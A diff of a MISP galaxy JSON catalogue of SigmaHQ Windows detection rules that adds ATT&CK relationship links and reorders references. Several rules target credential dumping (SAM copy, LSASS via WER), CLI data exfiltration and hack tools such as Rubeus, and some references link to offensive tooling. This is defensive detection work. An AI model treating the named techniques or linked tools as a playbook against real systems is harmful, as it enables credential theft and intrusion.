"dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "value": "Windows Shell Spawning Suspicious Program" }, 
@@ -45933,10 +59004,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", - "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" ], "tags": [ @@ -45944,6 +59015,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", "value": "Accesschk Usage To Check Privileges" }, @@ -45968,6 +59048,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "value": "Use of TTDInject.exe" }, @@ -45993,6 +59082,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "value": "Using AppVLP To Circumvent ASR File Path Rule" }, 
@@ -46009,10 +59107,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" ], "tags": [ @@ -46020,6 +59118,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "value": "Suspicious Ping And Del Combination" }, @@ -46046,6 +59153,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "value": "Suspicious Scheduled Task Creation Involving Temp Folder" }, 
@@ -46096,6 +59212,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "value": "MsiExec Web Install" }, @@ -46122,6 +59254,22 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", "value": "GatherNetworkInfo.vbs Script Usage" }, @@ -46148,6 +59296,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", "value": "LOLBIN Execution Of The FTP.EXE Binary" }, @@ -46173,6 +59337,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", "value": "Exploiting CVE-2019-1388" }, 
@@ -46197,6 +59370,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "value": "Always Install Elevated MSI Spawned Cmd And Powershell" }, @@ -46223,6 +59405,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "value": "CreateDump Process Dump" }, @@ -46272,6 +59463,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1af57a4b-460a-4738-9034-db68b880c665", "value": "PowerShell SAM Copy" }, @@ -46296,6 +59496,15 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", "value": "SILENTTRINITY Stager Execution" }, @@ -46312,9 +59521,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://github.com/GhostPack/Rubeus", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" ], "tags": [ 
@@ -46325,6 +59534,15 @@ "attack.t1550.003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", "value": "Rubeus Hack Tool" }, @@ -46341,8 +59559,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/killamjr/status/1179034907932315648", "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://twitter.com/killamjr/status/1179034907932315648", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" ], "tags": [ @@ -46350,6 +59568,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", "value": "QBot Process Creation" }, @@ -46376,6 +59603,22 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "value": "PrintBrm ZIP Creation of Extraction" }, 
@@ -46392,11 +59635,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", - "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" ], "tags": [ 
@@ -46415,6 +59658,43 @@ "attack.s0039" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", "value": "Net.exe Execution" }, @@ -46440,6 +59720,22 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", "value": "Shadow Copies Access via Symlink" }, @@ -46464,6 +59760,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", "value": "Renamed Msdt.exe" }, 
@@ -46515,6 +59820,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", "value": "NSudo Tool Execution" }, @@ -46539,6 +59853,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", "value": "UtilityFunctions.ps1 Proxy Dll" }, @@ -46555,10 +59878,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", - "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" ], "tags": [ @@ -46566,6 +59889,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", "value": "Suspicious Rundll32 Setupapi.dll Activity" }, 
@@ -46583,8 +59915,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ @@ -46592,6 +59924,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", "value": "Net.exe User Account Creation" }, @@ -46608,8 +59949,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1474899714290208777?s=12", "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" ], "tags": "No established tags" @@ -46641,6 +59982,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "value": "Suspicious RDP Redirect Using TSCON" }, 
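Review bot: The last hunk on this line (`@@ -46608,8 +59949,8 @@`, the dtrace kernel dump rule) ends with `"tags": "No established tags"`, a string, while every other entry visible in this diff has `"tags": [ ... ]`; a key whose type varies between records breaks any consumer that iterates `meta.tags` to derive MISP tags from the `attack.*` values, and the placeholder is a sentinel baked into data. Emit an empty array instead, `"tags": []`, or drop the key for rules with no tags. The line is unchanged context here, but since the commit regenerates the whole galaxy the generator's fallback is the place to fix it.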
@@ -46665,6 +60015,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", "value": "Use of NetSupport Remote Access Software" }, @@ -46690,6 +60049,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", "value": "Hurricane Panda Activity" }, @@ -46717,6 +60085,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "value": "Suspicious Encoded Obfuscated LOAD String" }, @@ -46733,8 +60110,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml" ], "tags": [ @@ -46742,6 +60119,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "value": "Potential Credential Dumping Via WER" }, 
@@ -46768,6 +60154,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", "value": "Renamed FTP.EXE Binary Execution" }, @@ -46784,8 +60186,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/chromeloader/", "https://emkc.org/s/RJjuLa", + "https://redcanary.com/blog/chromeloader/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" ], "tags": [ @@ -46793,6 +60195,15 @@ "attack.t1176" ] }, + "related": [ + { + "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", "value": "Powershell ChromeLoader Browser Hijacker" }, @@ -46818,6 +60229,15 @@ "attack.t1496" ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "value": "Windows Crypto Mining Indicators" }, @@ -46842,6 +60262,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", "value": "JSC Convert Javascript To Executable" }, 
@@ -46869,6 +60298,15 @@ "car.2019-04-003" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "value": "Regsvr32 Anomaly" }, @@ -46885,9 +60323,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" ], "tags": [ @@ -46895,6 +60333,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "value": "Disable Important Scheduled Task" }, @@ -46920,6 +60367,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", "value": "Execute MSDT Via Answer File" }, @@ -46944,6 +60400,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36210e0d-5b19-485d-a087-c096088885f0", "value": "Suspicious PowerShell Parameter Substring" }, 
@@ -46960,8 +60425,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://twitter.com/_st0pp3r_/status/1560072680887525378", + "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" ], "tags": [ @@ -46971,6 +60436,22 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", "value": "Execute Code with Pester.bat as Parent" }, @@ -46996,6 +60477,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", "value": "Suspicious ScreenSave Change by Reg.exe" }, @@ -47045,6 +60535,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", "value": "AnyDesk Inline Piped Password" }, 
@@ -47061,9 +60560,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" ], "tags": [ @@ -47071,6 +60570,15 @@ "attack.t1055.001" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6345b048-8441-43a7-9bed-541133633d7a", "value": "ZOHO Dctask64 Process Injection" }, @@ -47095,6 +60603,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "value": "Possible Exfiltration Of Data Via CLI" }, @@ -47145,6 +60662,22 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "value": "Application Whitelisting Bypass via Dnx.exe" }, 
@@ -47162,9 +60695,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", - "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], "tags": [ @@ -47172,6 +60705,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "value": "Use of VisualUiaVerifyNative.exe" }, @@ -47196,6 +60738,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", "value": "Suspicious Cmd Execution via WMI" }, @@ -47220,6 +60771,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "value": "ADCSPwn Hack Tool" }, 
@@ -47236,8 +60796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ @@ -47269,6 +60829,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", "value": "VMToolsd Suspicious Child Process" }, @@ -47295,6 +60864,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "value": "Scheduled Task Executing Powershell Encoded Payload from Registry" }, @@ -47313,8 +60898,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", 